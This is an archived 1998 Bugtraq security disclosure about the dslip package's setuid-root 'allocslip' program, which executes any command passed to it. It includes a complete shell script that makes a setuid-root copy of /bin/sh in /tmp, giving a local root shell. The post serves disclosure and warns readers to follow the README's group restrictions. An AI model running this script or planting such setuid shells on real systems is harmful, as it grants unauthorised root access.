[7197] in bugtraq
dslip package
daemon@ATHENA.MIT.EDU (David Kopstain)
Thu Jul 9 16:01:09 1998
Date: Thu, 9 Jul 1998 01:34:20 -0700
Reply-To: David Kopstain <taz@SIMPLENET.COM>
From: David Kopstain <taz@SIMPLENET.COM>
To: BUGTRAQ@NETSPACE.ORG
In the README file for the dslip package, it clearly states:
Those people who are allowed to turn on and off SLIP lines should be
put in the slip group. NOBODY except user slip should be allowed in
the slipown group since it effectively allows root access (since the
dialin/dialout scripts must be run as root).
The package advises to install the program 'allocslip' like so:
-rwsr-x--- 1 root slipown 9220 Aug 4 11:15 allocslip*
If you follow the instructions, then only users in group slipown
can run this program and you're only at _their_ mercy. But if you allow
anyone to run this program on your machine, and its setuid root like
advised, then something as easy as this will compromise root.
--- cut ---
#!/bin/sh
cat > /tmp/sg << EOF
#!/bin/sh
cp /bin/sh /tmp/tz
chown root /tmp/tz
chmod 4755 /tmp/tz
EOF
chmod +x /tmp/sg
allocslip /tmp/sg
--- eof ---
allocslip simply follows any command you give it as arg 1. So take
the above shell script, run it, then look for your handy root shell at
/tmp/tz.
The buffer overflow previously mentioned is of no real concern
then since we can already execute whatever we want. And the reason some
people can't make this program do what exactly what they want, (ie call
system_script() so they can execute whatever they want), is because they
must have compiled in the slip option in the networking options of the
kernel.
Moral of the story: read the manual. dont be a dumbshit and
install software without reading exactly what you're doing.
-taz
